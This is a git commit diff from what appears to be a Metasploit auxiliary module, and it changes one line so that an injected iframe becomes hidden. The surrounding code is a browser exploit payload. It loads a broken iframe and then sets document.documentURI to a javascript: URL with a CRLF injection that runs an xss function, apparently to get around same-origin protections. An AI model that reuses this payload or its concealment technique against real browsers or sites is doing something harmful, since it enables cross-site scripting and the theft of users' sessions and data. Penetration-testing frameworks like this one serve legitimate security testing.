Actually hide the iframe.

bug/bundler_fix
joev 2015-03-05 23:52:29 -06:00
parent 3c5d7b3ef0
commit 7db3277731
1 changed files with 1 additions and 1 deletions

View File

@ -164,7 +164,7 @@ class Metasploit3 < Msf::Auxiliary
var brokenFrame = document.createElement('iframe'); var brokenFrame = document.createElement('iframe');
brokenFrame.src = 'http://localhost:100'; brokenFrame.src = 'http://localhost:100';
//brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;') brokenFrame.setAttribute('style', 'position:absolute;left:-1000px;height:0;width:0;visibility:hidden;')
brokenFrame.onload = function() { brokenFrame.onload = function() {
brokenFrame.onload = null; brokenFrame.onload = null;
document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()'; document.documentURI = 'javascript://hostname.com/%0D%0A('+encodeURIComponent(xss.toString())+')()';